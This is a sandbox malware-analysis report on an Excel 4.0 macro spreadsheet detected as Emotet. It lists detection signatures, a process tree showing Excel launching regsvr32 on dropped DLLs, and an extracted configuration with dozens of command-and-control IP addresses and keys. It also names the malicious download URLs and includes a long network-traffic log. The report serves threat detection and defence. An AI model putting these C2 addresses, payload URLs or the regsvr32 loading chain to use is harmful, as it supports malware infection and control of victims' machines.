Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Untitled-09112022.xls

Overview

General Information

Sample Name:Untitled-09112022.xls
Analysis ID:747191
MD5:8079b54a0c76ba1fec822059aa22ea31
SHA1:c71c6fd2c68cc8746e778e907984927458a13ab8
SHA256:9d0827721715ca365e0138d9a0bbef43bf209005605793b35e3e9b73337426a6
Infos:

Detection

Hidden Macro 4.0, Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Creates an autostart registry key pointing to binary in C:\Windows
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Drops files with a non-matching file extension (content does not match file extension)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Registers a DLL
Drops PE files to the user directory
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3024 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1528 cmdline: C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1552 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FgEHLIiiJRN\xoEOackyxDExhQ.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2484 cmdline: C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2428 cmdline: C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 280 cmdline: C:\Windows\System32\regsvr32.exe /S ..\elv4.ooocccxxx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • regsvr32.exe (PID: 1448 cmdline: C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\FgEHLIiiJRN\xoEOackyxDExhQ.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["172.105.115.71:8080", "218.38.121.17:443", "186.250.48.5:443", "103.71.99.57:8080", "85.214.67.203:8080", "85.25.120.45:8080", "139.196.72.155:8080", "103.85.95.4:8080", "198.199.70.22:8080", "209.239.112.82:8080", "78.47.204.80:443", "36.67.23.59:443", "104.244.79.94:443", "62.171.178.147:8080", "195.77.239.39:8080", "103.56.149.105:8080", "80.211.107.116:8080", "93.104.209.107:8080", "174.138.33.49:7080", "202.28.34.99:8080", "178.62.112.199:8080", "114.79.130.68:443", "118.98.72.86:443", "103.41.204.169:8080", "178.238.225.252:8080", "83.229.80.93:8080", "46.101.98.60:8080", "82.98.180.154:7080", "87.106.97.83:7080", "196.44.98.190:8080", "139.59.80.108:8080", "103.224.241.74:8080", "103.254.12.236:7080", "185.148.169.10:8080", "165.22.254.236:8080", "37.44.244.177:8080", "54.37.228.122:443", "51.75.33.122:443", "128.199.217.206:443", "188.165.79.151:443", "210.57.209.142:8080", "160.16.143.191:8080", "175.126.176.79:8080", "202.134.4.210:7080", "103.126.216.86:443", "190.145.8.4:443", "128.199.242.164:8080", "64.227.55.231:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU00LrOacIAAIg=", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCWzrrOacIAAJA="]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Untitled-09112022.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x148aa:$s1: Excel
  • 0x1593f:$s1: Excel
  • 0x35d0:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Desktop\Untitled-09112022.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x148aa:$s1: Excel
  • 0x1593f:$s1: Excel
  • 0x35d0:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
C:\Users\user\Desktop\4DF60000SUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x14aaa:$s1: Excel
  • 0x15b3c:$s1: Excel
  • 0x3381:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
C:\Users\user\Desktop\4DF60000JoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.920122880.0000000002011000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000004.00000002.920051864.00000000004D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        0000000B.00000002.1193361768.00000000001EA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Emotet_3Yara detected EmotetJoe Security
          00000006.00000002.1193389765.0000000000211000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            0000000B.00000002.1193544536.0000000002031000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              Click to see the 3 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              11.2.regsvr32.exe.2b0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                6.2.regsvr32.exe.160000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  11.2.regsvr32.exe.2b0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    4.2.regsvr32.exe.4d0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      6.2.regsvr32.exe.160000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                        Click to see the 1 entries

                        Sigma Signatures

                        No Sigma rule has matched

                        Snort Signatures

                        Timestamp:192.168.2.22218.38.121.17491794432404326 11/16/22-05:44:10.140861
                        SID:2404326
                        Source Port:49179
                        Destination Port:443
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.22115.178.55.2249175802404304 11/16/22-05:43:55.004674
                        SID:2404304
                        Source Port:49175
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Multi AV Scanner detection for submitted file
                        Source: Untitled-09112022.xlsReversingLabs: Detection: 46%
                        Source: Untitled-09112022.xlsVirustotal: Detection: 61%Perma Link
                        Antivirus detection for URL or domain
                        Source: http://www.cecambrils.cat/wp-content/cXEhHssszV/Avira URL Cloud: Label: malware
                        Source: http://www.stickers-et-deco.com/admin002vqimbe/hRFZkkzLIl/Avira URL Cloud: Label: malware
                        Source: http://hsweixintp.com/wp-admin/4m1WxDxza6D8SVrfF/Avira URL Cloud: Label: malware
                        Source: http://www.clinicaportalpsicologia.com.br/wp-includes/d6tkyFFBNwY/Avira URL Cloud: Label: malware
                        Multi AV Scanner detection for domain / URL
                        Source: cecambrils.catVirustotal: Detection: 7%Perma Link
                        Source: www.stickers-et-deco.comVirustotal: Detection: 12%Perma Link
                        Source: hsweixintp.comVirustotal: Detection: 14%Perma Link
                        Multi AV Scanner detection for dropped file
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Ji8QgmpX3lS3yT[1].dllReversingLabs: Detection: 69%
                        Source: C:\Users\user\elv1.ooocccxxxReversingLabs: Detection: 69%
                        Source: C:\Windows\System32\FgEHLIiiJRN\xoEOackyxDExhQ.dll (copy)ReversingLabs: Detection: 69%
                        Source: 0000000B.00000002.1193361768.00000000001EA000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["172.105.115.71:8080", "218.38.121.17:443", "186.250.48.5:443", "103.71.99.57:8080", "85.214.67.203:8080", "85.25.120.45:8080", "139.196.72.155:8080", "103.85.95.4:8080", "198.199.70.22:8080", "209.239.112.82:8080", "78.47.204.80:443", "36.67.23.59:443", "104.244.79.94:443", "62.171.178.147:8080", "195.77.239.39:8080", "103.56.149.105:8080", "80.211.107.116:8080", "93.104.209.107:8080", "174.138.33.49:7080", "202.28.34.99:8080", "178.62.112.199:8080", "114.79.130.68:443", "118.98.72.86:443", "103.41.204.169:8080", "178.238.225.252:8080", "83.229.80.93:8080", "46.101.98.60:8080", "82.98.180.154:7080", "87.106.97.83:7080", "196.44.98.190:8080", "139.59.80.108:8080", "103.224.241.74:8080", "103.254.12.236:7080", "185.148.169.10:8080", "165.22.254.236:8080", "37.44.244.177:8080", "54.37.228.122:443", "51.75.33.122:443", "128.199.217.206:443", "188.165.79.151:443", "210.57.209.142:8080", "160.16.143.191:8080", "175.126.176.79:8080", "202.134.4.210:7080", "103.126.216.86:443", "190.145.8.4:443", "128.199.242.164:8080", "64.227.55.231:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU00LrOacIAAIg=", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCWzrrOacIAAJA="]}
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018004A020 CryptStringToBinaryA,CryptStringToBinaryA,
                        Source: unknownHTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49179 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49184 version: TLS 1.0
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180029290 FindFirstFileExW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002972C FindFirstFileExW,FindNextFileW,FindClose,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180028B30 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180028B30 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021DA80 FindNextFileW,FindFirstFileW,FindClose,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203DA80 FindNextFileW,FindFirstFileW,FindClose,

                        Software Vulnerabilities

                        barindex
                        Document exploit detected (drops PE files)
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: Ji8QgmpX3lS3yT[1].dll.0.drJump to dropped file
                        Document exploit detected (creates forbidden files)
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Ji8QgmpX3lS3yT[1].dllJump to behavior
                        Document exploit detected (process start blacklist hit)
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
                        Document exploit detected (UrlDownloadToFile)
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
                        Source: global trafficDNS query: name: hsweixintp.com
                        Source: global trafficDNS query: name: hsweixintp.com
                        Source: global trafficDNS query: name: www.stickers-et-deco.com
                        Source: global trafficDNS query: name: www.cecambrils.cat
                        Source: global trafficDNS query: name: www.clinicaportalpsicologia.com.br
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
